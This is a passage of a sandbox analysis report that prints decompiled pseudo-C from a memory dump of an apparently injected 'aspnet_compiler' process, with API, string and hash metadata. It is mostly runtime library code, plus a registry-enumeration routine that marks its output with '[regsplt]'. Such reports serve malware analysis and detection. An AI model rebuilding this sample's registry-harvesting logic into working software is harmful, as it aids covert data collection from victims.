                    														goto L112;
                    													}
                    													_t173 =  &(_t173[1]);
                    													 *( *_t146) = _t155;
                    													 *_t146 =  &(( *_t146)[0]);
                    													 *_t183 =  *_t183 - 1;
                    													_t155 =  *_t173 & 0x0000ffff;
                    													__eflags = _t155;
                    													if(_t155 != 0) {
                    														continue;
                    													}
                    													goto L112;
                    												}
                    											} else {
                    												__eflags =  *_t183;
                    												if( *_t183 <= 0) {
                    													goto L91;
                    												}
                    												_t180 = _v40;
                    												 *((short*)( *_t180)) =  *_t173;
                    												 *_t180 =  *_t180 + 2;
                    												 *_t183 =  *_t183 - 1;
                    											}
                    											goto L112;
                    										}
                    										__eflags = _t104 != 5;
                    										if(_t104 != 5) {
                    											goto L108;
                    										}
                    										_t153 = _t152;
                    										__eflags = _t153;
                    										if(_t153 == 0) {
                    											_push(0x79);
                    											goto L111;
                    										}
                    										_t153 = _t153;
                    										__eflags = _t153;
                    										if(_t153 != 0) {
                    											goto L108;
                    										}
                    										_push(0x59);
                    										goto L111;
                    									}
                    									if(__eflags == 0) {
                    										_t153 = _t152 - 1;
                    										__eflags = _t153;
                    										if(_t153 == 0) {
                    											_v32 = 1;
                    											L75:
                    											_push(0x64);
                    											goto L111;
                    										}
                    										_t153 = _t153 - 1;
                    										__eflags = _t153;
                    										if(_t153 == 0) {
                    											goto L75;
                    										}
                    										_t153 = _t153 - 1;
                    										__eflags = _t153;
                    										if(_t153 == 0) {
                    											_push(0x61);
                    											goto L111;
                    										}
                    										_t153 = _t153 - 1;
                    										__eflags = _t153;
                    										if(_t153 != 0) {
                    											goto L108;
                    										}
                    										_push(0x41);
                    										goto L111;
                    									}
                    									__eflags = _t95 - 0x27;
                    									if(_t95 == 0x27) {
                    										_t110 = _t152 & 0x80000001;
                    										__eflags = _t110;
                    										if(__eflags < 0) {
                    											__eflags = (_t110 - 0x00000001 | 0xfffffffe) + 1;
                    										}
                    										_t179 =  &(_t179[_t152]);
                    										if(__eflags == 0) {
                    											_t159 =  *_t179 & 0x0000ffff;
                    											__eflags = _t159;
                    											if(_t159 == 0) {
                    												goto L28;
                    											}
                    											_t174 = _v40;
                    											while(1) {
                    												__eflags =  *_t183;
                    												if( *_t183 == 0) {
                    													goto L113;
                    												}
                    												_t111 = 0x27;
                    												_t179 =  &(_t179[1]);
                    												__eflags = _t159 - _t111;
                    												if(_t159 == _t111) {
                    													goto L113;
                    												}
                    												 *( *_t174) = _t159;
                    												 *_t174 =  &(( *_t174)[0]);
                    												 *_t183 =  *_t183 - 1;
                    												_t159 =  *_t179 & 0x0000ffff;
                    												__eflags = _t159;
                    												if(_t159 != 0) {
                    													continue;
                    												}
                    												goto L113;
                    											}
                    										}
                    										continue;
                    									}
                    									__eflags = _t95 - 0x41;
                    									if(_t95 == 0x41) {
                    										L41:
                    										_t116 = E00452294(_t145, _t179, _t183, _t179, L"am/pm");
                    										__eflags = _t116;
                    										if(_t116 != 0) {
                    											_t117 = E00452294(_t145, _t179, _t183, _t179, L"a/p");
                    											_pop(_t153);
                    											__eflags = _t117;
                    											if(_t117 == 0) {
                    												_v28 =  &(_t179[3]);
                    											}
                    										} else {
                    											_t153 =  &(_t179[5]);
                    											_v28 =  &(_t179[5]);
                    										}
                    										_push(0x70);
                    										goto L111;
                    									}
                    									__eflags = _t95 - 0x48;
                    									if(_t95 == 0x48) {
                    										_t153 = _t152 - 1;
                    										__eflags = _t153;
                    										if(_t153 == 0) {
                    											_v32 = 1;
                    											L55:
                    											_push(0x48);
                    											goto L111;
                    										}
                    										_t153 = _t153 - 1;
                    										__eflags = _t153;
                    										if(_t153 == 0) {
                    											goto L55;
                    										}
                    										goto L108;
                    									}
                    									__eflags = _t95 - 0x4d;
                    									if(_t95 == 0x4d) {
                    										_t153 = _t152 - 1;
                    										__eflags = _t153;
                    										if(_t153 == 0) {
                    											_v32 = 1;
                    											L50:
                    											_push(0x6d);
                    											goto L111;
                    										}
                    										_t153 = _t153 - 1;
                    										__eflags = _t153;
                    										if(_t153 == 0) {
                    											goto L50;
                    										}
                    										_t153 = _t153 - 1;
                    										__eflags = _t153;
                    										if(_t153 == 0) {
                    											_push(0x62);
                    											goto L111;
                    										}
                    										_t153 = _t153 - 1;
                    										__eflags = _t153;
                    										if(_t153 != 0) {
                    											goto L108;
                    										}
                    										_push(0x42);
                    										goto L111;
                    									}
                    									__eflags = _t95 - 0x61;
                    									if(_t95 != 0x61) {
                    										goto L108;
                    									}
                    									goto L41;
                    								}
                    								goto L28;
                    							}
                    							_t203 = _v33;
                    							if(_v33 == 0) {
                    								_t133 = E004470EB(_t165, _t184, __eflags,  *((intOrPtr*)(_v44 + 0x160)), 0,  &_v24, _t179, _t184, _t147, 0);
                    							} else {
                    								_t133 = E0044722D(_t165, _t184, _t203,  *((intOrPtr*)(_v44 + 0x160)), 0,  &_v24, _t179, _t184, _t147);
                    							}
                    							_t181 = _t184;
                    							_t177 = _t133 - 1;
                    							if(_t177 <= 0) {
                    								L27:
                    								E00434713(_t184);
                    								goto L28;
                    							} else {
                    								_t148 = _v32;
                    								_t185 = _v40;
                    								while( *_t148 > 0) {
                    									_t135 =  *_t181;
                    									_t181 = _t181 + 2;
                    									 *( *_t185) = _t135;
                    									 *_t185 =  &(( *_t185)[0]);
                    									 *_t148 =  *_t148 - 1;
                    									_t177 = _t177 - 1;
                    									if(_t177 > 0) {
                    										continue;
                    									}
                    									break;
                    								}
                    								_t184 = _v28;
                    								goto L27;
                    							}
                    						}
                    						asm("sbb eax, eax");
                    						_t137 = _t129 & _t175 + 0x00000008;
                    						_t165 = _t175 + 8;
                    						if((_t129 & _t175 + 0x00000008) > 0x400) {
                    							__eflags = _t175 - _t165;
                    							asm("sbb eax, eax");
                    							_t186 = E00444A38(_t165, _t137 & _t165);
                    							_v28 = _t186;
                    							_pop(_t165);
                    							__eflags = _t186;
                    							if(__eflags == 0) {
                    								goto L30;
                    							}
                    							 *_t186 = 0xdddd;
                    							L14:
                    							_t184 = _t186 + 8;
                    							goto L18;
                    						}
                    						asm("sbb eax, eax");
                    						E00455A90();
                    						_t186 = _t188;
                    						_v28 = _t186;
                    						if(_t186 == 0) {
                    							goto L30;
                    						}
                    						 *_t186 = 0xcccc;
                    						goto L14;
                    					}
                    				}
                    			}

                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: __freea$__alloca_probe_16_free
                    • String ID: a/p$am/pm$hcD
                    • API String ID: 2936374016-190199888
                    • Opcode ID: 5c7e93bfea36d6bfccbfe78ada7fac18a8ac017cf94aac838d0c5b4a5acd0a7e
                    • Instruction ID: 32e67ee006756031a0b78f425dd56af27fcec1da6a44ec8361004faafc6abf4c
                    • Opcode Fuzzy Hash: 5c7e93bfea36d6bfccbfe78ada7fac18a8ac017cf94aac838d0c5b4a5acd0a7e
                    • Instruction Fuzzy Hash: A9D1D231900205ABFB249FA8C955ABBB7B0FF06300F25419BE941AB342D77D9D81CB5B
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 95%
                    			E0044F2A5(void* __edx, char _a4) {
                    				void* _v8;
                    				void* _v12;
                    				signed int _v16;
                    				signed int _v20;
                    				signed int _v24;
                    				char _v28;
                    				void* __ebx;
                    				void* __edi;
                    				void* __esi;
                    				void* _t53;
                    				void _t57;
                    				intOrPtr _t58;
                    				intOrPtr _t59;
                    				intOrPtr _t60;
                    				intOrPtr _t61;
                    				signed int _t64;
                    				char _t92;
                    				char _t100;
                    				void* _t101;
                    				signed int _t104;
                    				void* _t107;
                    				void* _t121;
                    				char* _t123;
                    				signed int _t127;
                    				intOrPtr* _t132;
                    				void* _t133;
                    				intOrPtr* _t134;
                    				signed int _t135;
                    				signed int _t136;
                    				signed int _t137;
                    				signed int _t138;
                    				char* _t139;
                    
                    				_t121 = __edx;
                    				_t100 = _a4;
                    				_v28 = _t100;
                    				_v24 = 0;
                    				if( *((intOrPtr*)(_t100 + 0xb0)) != 0 ||  *((intOrPtr*)(_t100 + 0xac)) != 0) {
                    					_v16 = 1;
                    					_t53 = E004443F4(_t101, 1, 0x50);
                    					_v8 = _t53;
                    					if(_t53 != 0) {
                    						_t104 = 0x14;
                    						memcpy(_t53,  *(_t100 + 0x88), _t104 << 2);
                    						_t132 = E00444A38(0, 4);
                    						_t127 = 0;
                    						_v12 = _t132;
                    						E00445002(0);
                    						_pop(_t107);
                    						if(_t132 != 0) {
                    							 *_t132 = 0;
                    							if( *((intOrPtr*)(_t100 + 0xb0)) == 0) {
                    								_t133 = _v8;
                    								_t57 =  *0x46f188; // 0x46f180
                    								 *_t133 = _t57;
                    								_t58 =  *0x46f18c; // 0x47065c
                    								 *((intOrPtr*)(_t133 + 4)) = _t58;
                    								_t59 =  *0x46f190; // 0x47065c
                    								 *((intOrPtr*)(_t133 + 8)) = _t59;
                    								_t60 =  *0x46f1b8; // 0x46f184
                    								 *((intOrPtr*)(_t133 + 0x30)) = _t60;
                    								_t61 =  *0x46f1bc; // 0x470660
                    								 *((intOrPtr*)(_t133 + 0x34)) = _t61;
                    								L19:
                    								 *_v12 = 1;
                    								if(_t127 != 0) {
                    									 *_t127 = 1;
                    								}
                    								goto L21;
                    							}
                    							_t134 = E00444A38(_t107, 4);
                    							_v20 = _t134;
                    							E00445002(0);
                    							if(_t134 == 0) {
                    								L11:
                    								E00445002(_v8);
                    								E00445002(_v12);
                    								return _v16;
                    							}
                    							 *_t134 = 0;
                    							_t128 =  *((intOrPtr*)(_t100 + 0xb0));
                    							_t135 = E004516F4(_t100, _t121,  *((intOrPtr*)(_t100 + 0xb0)), _t134,  &_v28, 1,  *((intOrPtr*)(_t100 + 0xb0)), 0xe, _v8);
                    							_t136 = _t135 | E004516F4(_t100, _t121,  *((intOrPtr*)(_t100 + 0xb0)), _t135,  &_v28, 1, _t128, 0xf, _v8 + 4);
                    							_v16 = _v8 + 8;
                    							_t137 = _t136 | E004516F4(_t100, _t121, _t128, _t136,  &_v28, 1, _t128, 0x10, _v8 + 8);
                    							_t138 = _t137 | E004516F4(_t100, _t121, _t128, _t137,  &_v28, 2, _t128, 0xe, _v8 + 0x30);
                    							if((E004516F4(_t100, _t121, _t128, _t138,  &_v28, 2, _t128, 0xf, _v8 + 0x34) | _t138) == 0) {
                    								_t123 =  *_v16;
                    								while( *_t123 != 0) {
                    									_t92 =  *_t123;
                    									if(_t92 < 0x30 || _t92 > 0x39) {
                    										if(_t92 != 0x3b) {
                    											goto L16;
                    										}
                    										_t139 = _t123;
                    										do {
                    											 *_t139 =  *((intOrPtr*)(_t139 + 1));
                    											_t139 = _t139 + 1;
                    										} while ( *_t139 != 0);
                    									} else {
                    										 *_t123 = _t92 - 0x30;
                    										L16:
                    										_t123 = _t123 + 1;
                    									}
                    								}
                    								_t127 = _v20;
                    								_t133 = _v8;
                    								goto L19;
                    							}
                    							E0044F23C(_v8);
                    							_v16 = _v16 | 0xffffffff;
                    							goto L11;
                    						}
                    						E00445002(_v8);
                    						return 1;
                    					}
                    					return 1;
                    				} else {
                    					_t127 = 0;
                    					_v12 = 0;
                    					_t133 = 0x46f188;
                    					L21:
                    					_t64 =  *(_t100 + 0x80);
                    					if(_t64 != 0) {
                    						asm("lock dec dword [eax]");
                    					}
                    					if( *((intOrPtr*)(_t100 + 0x7c)) != 0) {
                    						asm("lock xadd [ecx], eax");
                    						if((_t64 | 0xffffffff) == 0) {
                    							E00445002( *((intOrPtr*)(_t100 + 0x7c)));
                    							E00445002( *(_t100 + 0x88));
                    						}
                    					}
                    					 *((intOrPtr*)(_t100 + 0x7c)) = _v12;
                    					 *(_t100 + 0x80) = _t127;
                    					 *(_t100 + 0x88) = _t133;
                    					return 0;
                    				}
                    			}

                    APIs
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: _free
                    • String ID:
                    • API String ID: 269201875-0
                    • Opcode ID: bdae3a8ff5b80d57b785f2781f8bb375039c999b1d8b81c3e14c9f7f4d8bf86a
                    • Instruction ID: 121fa3ad2d8a90f2dd1ed919a7657a0be01bb40abeb4b2edb7d8cd7f10ddde60
                    • Opcode Fuzzy Hash: bdae3a8ff5b80d57b785f2781f8bb375039c999b1d8b81c3e14c9f7f4d8bf86a
                    • Instruction Fuzzy Hash: D8610075900205AFEB20CF69C842B9FBBF4EF15724F14407BE844EB242EB749D468B98
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 89%
                    			E00412D3D(void* __ecx, short* __edx) {
                    				int _v8;
                    				int _v12;
                    				int _v16;
                    				int _v20;
                    				int _v24;
                    				int _v28;
                    				int _v32;
                    				char _v56;
                    				int _v60;
                    				int _v64;
                    				int _v68;
                    				int _v72;
                    				int _v76;
                    				struct _FILETIME _v84;
                    				void* _v95;
                    				char _v96;
                    				char _v108;
                    				char _v132;
                    				char _v156;
                    				short _v668;
                    				short _v1188;
                    				char _v11188;
                    				short _v43956;
                    				void* __ebx;
                    				void* __edi;
                    				void* __ebp;
                    				int _t72;
                    				long _t73;
                    				void* _t93;
                    				long _t103;
                    				void* _t104;
                    				void* _t110;
                    				void* _t140;
                    				int _t144;
                    				int _t146;
                    				void* _t147;
                    				void* _t148;
                    				void* _t149;
                    
                    				_t137 = __edx;
                    				_t112 = __ecx;
                    				E00455FB0();
                    				_push(_t140);
                    				_t144 = 0;
                    				_t110 = __ecx;
                    				E00435760(_t140,  &_v1188, 0, 0x208);
                    				_t149 = _t148 + 0xc;
                    				_v24 = 0x104;
                    				_v8 = 0;
                    				_v12 = 0x3fff;
                    				RegQueryInfoKeyW(_t110,  &_v1188,  &_v24, 0,  &_v8,  &_v76,  &_v72,  &_v20,  &_v68,  &_v64,  &_v60,  &_v84);
                    				_t72 = _v8;
                    				if(_t72 != 0 && _t72 != 0) {
                    					do {
                    						_v28 = 0xff;
                    						_t103 = RegEnumKeyExW(_t110, _t144,  &_v668,  &_v28, 0, 0, 0,  &_v84);
                    						_t152 = _t103;
                    						if(_t103 == 0) {
                    							_t104 = E0040415E(_t110,  &_v56, _t137, _t147, "\n");
                    							_t137 =  &_v668;
                    							E0040323D(E004042DC(_t110,  &_v108,  &_v668, _t147, _t152, _t104));
                    							E00401EE9();
                    							_t112 =  &_v56;
                    							E00401EE9();
                    						}
                    						_t144 = _t144 + 1;
                    					} while (_t144 < _v8);
                    				}
                    				_t73 = _v20;
                    				if(_t73 != 0) {
                    					_t146 = 0;
                    					if(_t73 != 0) {
                    						do {
                    							_v96 = 0;
                    							_v16 = 0x2710;
                    							asm("stosd");
                    							_v12 = 0x3fff;
                    							asm("stosd");
                    							asm("stosw");
                    							asm("stosb");
                    							_v43956 = 0;
                    							_t73 = RegEnumValueW(_t110, _t146,  &_v43956,  &_v12, 0,  &_v32,  &_v11188,  &_v16);
                    							_t156 = _t73;
                    							if(_t73 == 0) {
                    								E00440751(_t112, _v32,  &_v96, 0xa);
                    								_t149 = _t149 + 0xc;
                    								E0040323D(E004042DC(_t110,  &_v56,  &_v43956, _t147, _t156, E0040415E(_t110,  &_v132, _t137, _t147, "\n")));
                    								E00401EE9();
                    								E00401EE9();
                    								L00403356(E004052DD(_t110,  &_v132,  &_v96, _t147, _t156, E00402073(_t110,  &_v56,  &_v43956, _t147, "\n")));
                    								E00401FB8();
                    								E00401FB8();
                    								_t93 = E00402073(_t110,  &_v156,  &_v96, _t147, "[regsplt]");
                    								_t137 = E00402097(_t110,  &_v56,  &_v96, _t147, _t156,  &_v11188, _v16);
                    								L00403356(E00402E81( &_v132, _t95, _t93));
                    								E00401FB8();
                    								E00401FB8();
                    								_t112 =  &_v156;
                    								_t73 = E00401FB8();
                    							}
                    							_t146 = _t146 + 1;
                    						} while (_t146 < _v20);
                    					}
                    				}
                    				return _t73;
                    			}

                    APIs
                    • RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 00412DA4
                    • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000104,00000000,?,?,?,?), ref: 00412DD3
                    • RegEnumValueW.ADVAPI32(?,00000000,?,00003FFF,00000000,?,?,00002710,?,?,?,?,?,?,?,?), ref: 00412E73
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: Enum$InfoQueryValue
                    • String ID: 4G$84G$[regsplt]
                    • API String ID: 3554306468-2898483682
                    • Opcode ID: af14ab2f211be19c5a0ce6283f8fc8ae5bb93f867747e7838a1519697747fa23
                    • Instruction ID: cf1d04cbe3be26fdb60a522ae5fe91f3eacc00445e23186f7e28dbfa0a80019f
                    • Opcode Fuzzy Hash: af14ab2f211be19c5a0ce6283f8fc8ae5bb93f867747e7838a1519697747fa23
                    • Instruction Fuzzy Hash: FA512B71900219AADB10EB91DD85EEFB7BCAF04304F50017AE505F2191EF74AB49CBA9
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 94%
                    			E0045551A(signed int __edx, intOrPtr _a4, intOrPtr _a8, char _a12) {
                    				int _v8;
                    				intOrPtr _v12;
                    				signed int _v16;
                    				signed int _v20;
                    				void* __ebx;
                    				void* __edi;
                    				void* __esi;
                    				signed int _t16;
                    				signed int _t17;
                    				int _t20;
                    				signed int _t21;
                    				int _t23;
                    				signed int _t25;
                    				int _t28;
                    				intOrPtr* _t30;
                    				int _t34;
                    				int _t35;
                    				void* _t36;
                    				intOrPtr* _t37;
                    				intOrPtr* _t38;
                    				int _t46;
                    				void* _t54;
                    				void* _t56;
                    				signed int _t58;
                    				int _t61;
                    				int _t63;
                    				void* _t64;
                    				void* _t65;
                    				void* _t66;
                    
                    				_t58 = __edx;
                    				_t59 = _a4;
                    				_t61 = 0;
                    				_t16 = E0044AB6C(_a4, 0, 0, 1);
                    				_v20 = _t16;
                    				_v16 = __edx;
                    				_t65 = _t64 + 0x10;
                    				if((_t16 & __edx) != 0xffffffff) {
                    					_t17 = E0044AB6C(_t59, 0, 0, 2);
                    					_t66 = _t65 + 0x10;
                    					_t51 = _t17 & __edx;
                    					__eflags = (_t17 & __edx) - 0xffffffff;
                    					if((_t17 & __edx) == 0xffffffff) {
                    						goto L1;
                    					}
                    					_t46 = _a8 - _t17;
                    					__eflags = _t46;
                    					_t5 =  &_a12; // 0x454445
                    					_t20 =  *_t5;
                    					asm("sbb eax, edx");
                    					_v8 = _t20;
                    					if(__eflags < 0) {
                    						L24:
                    						__eflags = _t20 - _t61;
                    						if(__eflags > 0) {
                    							L19:
                    							_t13 =  &_v20; // 0x454445
                    							_t21 = E0044AB6C(_t59,  *_t13, _v16, _t61);
                    							__eflags = (_t21 & _t58) - 0xffffffff;
                    							if((_t21 & _t58) != 0xffffffff) {
                    								_t23 = 0;
                    								__eflags = 0;
                    								L31:
                    								return _t23;
                    							}
                    							L20:
                    							_t23 =  *((intOrPtr*)(E0043EEAD()));
                    							goto L31;
                    						}
                    						if(__eflags < 0) {
                    							L27:
                    							_t14 =  &_a12; // 0x454445
                    							_t25 = E0044AB6C(_t59, _a8,  *_t14, _t61);
                    							_t66 = _t66 + 0x10;
                    							__eflags = (_t25 & _t58) - 0xffffffff;
                    							if((_t25 & _t58) == 0xffffffff) {
                    								goto L20;
                    							}
                    							_t28 = SetEndOfFile(E0044ED18(_t59));
                    							__eflags = _t28;
                    							if(_t28 != 0) {
                    								goto L19;
                    							}
                    							 *((intOrPtr*)(E0043EEAD())) = 0xd;
                    							_t30 = E0043EE9A();
                    							 *_t30 = GetLastError();
                    							goto L20;
                    						}
                    						__eflags = _t46 - _t61;
                    						if(_t46 >= _t61) {
                    							goto L19;
                    						}
                    						goto L27;
                    					}
                    					if(__eflags > 0) {
                    						L6:
                    						_t63 = E004443F4(_t51, 0x1000, 1);
                    						_pop(_t54);
                    						__eflags = _t63;
                    						if(_t63 != 0) {
                    							_v12 = E00442C00(_t54, _t59, 0x8000);
                    							_t34 = _v8;
                    							_pop(_t56);
                    							do {
                    								__eflags = _t34;
                    								if(__eflags < 0) {
                    									L13:
                    									_t35 = _t46;
                    									L14:
                    									_t36 = E0044A2B7(_t46, _t59, _t63, _t59, _t63, _t35);
                    									_t66 = _t66 + 0xc;
                    									__eflags = _t36 - 0xffffffff;
                    									if(_t36 == 0xffffffff) {
                    										_t37 = E0043EE9A();
                    										__eflags =  *_t37 - 5;
                    										if( *_t37 == 5) {
                    											 *((intOrPtr*)(E0043EEAD())) = 0xd;
                    										}
                    										L23:
                    										_t38 = E0043EEAD();
                    										E00445002(_t63);
                    										_t23 =  *_t38;
                    										goto L31;
                    									}
                    									asm("cdq");
                    									_t46 = _t46 - _t36;
                    									_t34 = _v8;
                    									asm("sbb eax, edx");
                    									_v8 = _t34;
                    									__eflags = _t34;
                    									if(__eflags > 0) {
                    										L12:
                    										_t35 = 0x1000;
                    										goto L14;
                    									}
                    									if(__eflags < 0) {
                    										break;
                    									}
                    									goto L17;
                    								}
                    								if(__eflags > 0) {
                    									goto L12;
                    								}
                    								__eflags = _t46 - 0x1000;
                    								if(_t46 < 0x1000) {
                    									goto L13;
                    								}
                    								goto L12;
                    								L17:
                    								__eflags = _t46;
                    							} while (_t46 != 0);
                    							E00442C00(_t56, _t59, _v12);
                    							E00445002(_t63);
                    							_t66 = _t66 + 0xc;
                    							_t61 = 0;
                    							__eflags = 0;
                    							goto L19;
                    						}
                    						 *((intOrPtr*)(E0043EEAD())) = 0xc;
                    						goto L23;
                    					}
                    					__eflags = _t46;
                    					if(_t46 <= 0) {
                    						goto L24;
                    					}
                    					goto L6;
                    				}
                    				L1:
                    				return  *((intOrPtr*)(E0043EEAD()));
                    			}

                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: _free
                    • String ID: EDE$EDE
                    • API String ID: 269201875-1143427775
                    • Opcode ID: 6c78bc0ecd021690797f9600b798c5c744d82ef1b2dec448d1b2b23438ea67aa
                    • Instruction ID: 88694d13a6d820189563449504a694bd1f50df3e673083fec4fd5d227810db4a
                    • Opcode Fuzzy Hash: 6c78bc0ecd021690797f9600b798c5c744d82ef1b2dec448d1b2b23438ea67aa
                    • Instruction Fuzzy Hash: 83415B31A00944BBEB206BBA8C52A7F3BA5DF45335F24051FFC18C22D3E67C8809566E
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 73%
                    			E00449C3C(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, signed int _a8, signed char* _a12, intOrPtr _a16) {
                    				signed int _v8;
                    				signed char _v15;
                    				char _v16;
                    				void _v24;
                    				short _v28;
                    				char _v31;
                    				void _v32;
                    				long _v36;
                    				intOrPtr _v40;
                    				void* _v44;
                    				signed int _v48;
                    				signed char* _v52;
                    				long _v56;
                    				int _v60;
                    				signed int _t78;
                    				signed int _t80;
                    				int _t86;
                    				void* _t94;
                    				long _t97;
                    				void _t105;
                    				void* _t112;
                    				signed int _t116;
                    				signed int _t118;
                    				signed char _t123;
                    				signed char _t128;
                    				intOrPtr _t129;
                    				signed int _t131;
                    				signed char* _t133;
                    				intOrPtr* _t135;
                    				signed int _t136;
                    				void* _t137;
                    
                    				_t78 =  *0x46f00c; // 0x54ba778e
                    				_v8 = _t78 ^ _t136;
                    				_t80 = _a8;
                    				_t118 = _t80 >> 6;
                    				_t116 = (_t80 & 0x0000003f) * 0x30;
                    				_t133 = _a12;
                    				_v52 = _t133;
                    				_v48 = _t118;
                    				_v44 =  *((intOrPtr*)( *((intOrPtr*)(0x470810 + _t118 * 4)) + _t116 + 0x18));
                    				_v40 = _a16 + _t133;
                    				_t86 = GetConsoleCP();
                    				_t135 = _a4;
                    				_v60 = _t86;
                    				 *_t135 = 0;
                    				 *((intOrPtr*)(_t135 + 4)) = 0;
                    				 *((intOrPtr*)(_t135 + 8)) = 0;
                    				while(_t133 < _v40) {
                    					_v28 = 0;
                    					_v31 =  *_t133;
                    					_t129 =  *((intOrPtr*)(0x470810 + _v48 * 4));
                    					_t123 =  *(_t129 + _t116 + 0x2d);
                    					if((_t123 & 0x00000004) == 0) {
                    						if(( *(E00444451(_t116, _t129) + ( *_t133 & 0x000000ff) * 2) & 0x00008000) == 0) {
                    							_push(1);
                    							_push(_t133);
                    							goto L8;
                    						} else {
                    							if(_t133 >= _v40) {
                    								_t131 = _v48;
                    								 *((char*)( *((intOrPtr*)(0x470810 + _t131 * 4)) + _t116 + 0x2e)) =  *_t133;
                    								 *( *((intOrPtr*)(0x470810 + _t131 * 4)) + _t116 + 0x2d) =  *( *((intOrPtr*)(0x470810 + _t131 * 4)) + _t116 + 0x2d) | 0x00000004;
                    								 *((intOrPtr*)(_t135 + 4)) =  *((intOrPtr*)(_t135 + 4)) + 1;
                    							} else {
                    								_t112 = E004486A2( &_v28, _t133, 2);
                    								_t137 = _t137 + 0xc;
                    								if(_t112 != 0xffffffff) {
                    									_t133 =  &(_t133[1]);
                    									goto L9;
                    								}
                    							}
                    						}
                    					} else {
                    						_t128 = _t123 & 0x000000fb;
                    						_v16 =  *((intOrPtr*)(_t129 + _t116 + 0x2e));
                    						_push(2);
                    						_v15 = _t128;
                    						 *(_t129 + _t116 + 0x2d) = _t128;
                    						_push( &_v16);
                    						L8:
                    						_push( &_v28);
                    						_t94 = E004486A2();
                    						_t137 = _t137 + 0xc;
                    						if(_t94 != 0xffffffff) {
                    							L9:
                    							_t133 =  &(_t133[1]);
                    							_t97 = WideCharToMultiByte(_v60, 0,  &_v28, 1,  &_v24, 5, 0, 0);
                    							_v56 = _t97;
                    							if(_t97 != 0) {
                    								if(WriteFile(_v44,  &_v24, _t97,  &_v36, 0) == 0) {
                    									L19:
                    									 *_t135 = GetLastError();
                    								} else {
                    									 *((intOrPtr*)(_t135 + 4)) =  *((intOrPtr*)(_t135 + 8)) - _v52 + _t133;
                    									if(_v36 >= _v56) {
                    										if(_v31 != 0xa) {
                    											goto L16;
                    										} else {
                    											_t105 = 0xd;
                    											_v32 = _t105;
                    											if(WriteFile(_v44,  &_v32, 1,  &_v36, 0) == 0) {
                    												goto L19;
                    											} else {
                    												if(_v36 >= 1) {
                    													 *((intOrPtr*)(_t135 + 8)) =  *((intOrPtr*)(_t135 + 8)) + 1;
                    													 *((intOrPtr*)(_t135 + 4)) =  *((intOrPtr*)(_t135 + 4)) + 1;
                    													goto L16;
                    												}
                    											}
                    										}
                    									}
                    								}
                    							}
                    						}
                    					}
                    					goto L20;
                    					L16:
                    				}
                    				L20:
                    				return E004338BB(_v8 ^ _t136);
                    			}

                    APIs
                    • GetConsoleCP.KERNEL32(FF8BC35D,00000000,?,?,?,?,?,?,?,0044A3B1,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 00449C7E
                    • __fassign.LIBCMT ref: 00449CF9
                    • __fassign.LIBCMT ref: 00449D14
                    • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 00449D3A
                    • WriteFile.KERNEL32(?,FF8BC35D,00000000,0044A3B1,00000000,?,?,?,?,?,?,?,?,?,0044A3B1,?), ref: 00449D59
                    • WriteFile.KERNEL32(?,?,00000001,0044A3B1,00000000,?,?,?,?,?,?,?,?,?,0044A3B1,?), ref: 00449D92
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                    • String ID:
                    • API String ID: 1324828854-0
                    • Opcode ID: 375b3492dfa092f37ad602e657ac1f80d9a3d9ae5f6776982733ad928ad8e07f
                    • Instruction ID: 2d42c393ae315c603a8a69066ade60cad850b82c9b10e16282d480ace16cedcb
                    • Opcode Fuzzy Hash: 375b3492dfa092f37ad602e657ac1f80d9a3d9ae5f6776982733ad928ad8e07f
                    • Instruction Fuzzy Hash: 1D5181B1E00249AFEB10CFA8D885AEEBBF4EF09300F14416BE955E7291D6749D41CB69
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 86%
                    			E00412FF5(short* __ecx, char __edx, void* __eflags, char _a4) {
                    				void* _v16;
                    				char _v28;
                    				char _v52;
                    				void* _v56;
                    				char _v76;
                    				void* _v80;
                    				char _v100;
                    				void* _v104;
                    				char _v124;
                    				void* _v128;
                    				char _v148;
                    				void* _v152;
                    				char _v172;
                    				void* _v176;
                    				char _v196;
                    				void* _v200;
                    				char _v220;
                    				void* _v224;
                    				char _v225;
                    				void* _v228;
                    				void* _v248;
                    				void* _v268;
                    				void* __ebx;
                    				void* __ebp;
                    				void* _t28;
                    				void* _t35;
                    				void* _t36;
                    				void* _t61;
                    				short* _t116;
                    				void* _t120;
                    				void* _t123;
                    				void* _t124;
                    
                    				_t103 = __edx;
